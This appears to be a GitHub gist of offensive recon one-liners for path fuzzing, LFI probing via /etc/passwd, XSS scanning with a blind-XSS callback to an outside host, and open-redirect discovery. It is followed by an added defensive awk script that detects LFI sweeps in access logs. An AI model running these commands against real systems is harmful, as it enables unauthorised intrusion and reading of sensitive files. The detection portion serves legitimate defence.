@incogbyte
Last active October 31, 2023 04:03
One liners recon
  • FFUF fuzzing paths + Domains
    • assetfinder DOMAIN.COM | sed 's#^\*\.##' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w wordlist_paths -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"'

  • LFI testing
    • gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

  • XSS testing + blind XSS
    • cat domains | waybackurls | grep -Eiv "\.(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | uro | dalfox pipe -b xss_hunter.ht -o xss_results

  • Open Redirect
    • cat domains | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew
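
Seen from the server side, the LFI one-liner above leaves a uniform trace: qsreplace sets every query-string value of each URL to the same payload. The following is an added defensive example, not part of the original gist, that flags clients producing that pattern in an access log. The function names, the combined log format, the threshold of 2 and the log lines themselves are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added defensive example. Log lines below are constructed sample data.

# Constructed access log in combined format (documentation-range IPs).
sample_log() {
cat <<'EOF'
203.0.113.7 - - [31/Oct/2023:04:00:01 +0000] "GET /view?file=%2Fetc%2Fpasswd HTTP/1.1" 200 512 "-" "curl/8.0"
203.0.113.7 - - [31/Oct/2023:04:00:01 +0000] "GET /page?id=%2Fetc%2Fpasswd&lang=%2Fetc%2Fpasswd HTTP/1.1" 404 0 "-" "curl/8.0"
203.0.113.7 - - [31/Oct/2023:04:00:02 +0000] "GET /dl?path=/etc/passwd HTTP/1.1" 403 0 "-" "curl/8.0"
198.51.100.20 - - [31/Oct/2023:04:00:03 +0000] "GET /view?file=report.pdf HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
198.51.100.20 - - [31/Oct/2023:04:00:04 +0000] "GET /docs?path=/etc/passwd&lang=en HTTP/1.1" 200 120 "-" "Mozilla/5.0"
192.0.2.5 - - [31/Oct/2023:04:00:05 +0000] "GET /a?x=%2fetc%2fpasswd HTTP/1.1" 404 0 "-" "curl/8.0"
EOF
}

# flag_lfi_sweeps MIN: read a combined-format log on stdin and print
# "client count" for clients with at least MIN requests in which every
# query parameter carries the value /etc/passwd (raw or %2F-encoded).
flag_lfi_sweeps() {
  awk -F'"' -v min="${1:-2}" '
    {
      split($1, pre, " "); ip = pre[1]      # client address
      split($2, req, " "); url = req[2]     # request target
      q = index(url, "?")
      if (q == 0) next                      # no query string
      n = split(substr(url, q + 1), kv, "&")
      hits = 0
      for (i = 1; i <= n; i++) {
        eq = index(kv[i], "=")
        if (eq == 0) continue
        val = tolower(substr(kv[i], eq + 1))
        gsub(/%2f/, "/", val)               # normalise encoded slashes
        if (val == "/etc/passwd") hits++
      }
      # Count only requests where all parameters hold the payload.
      if (n > 0 && hits == n) count[ip]++
    }
    END { for (ip in count) if (count[ip] >= min) print ip, count[ip] }
  ' | sort
}

sample_log | flag_lfi_sweeps 2
```

The all-parameters condition is deliberately narrow: it targets the bulk-replacement signature and will not flag a request that carries the path in only one of several parameters.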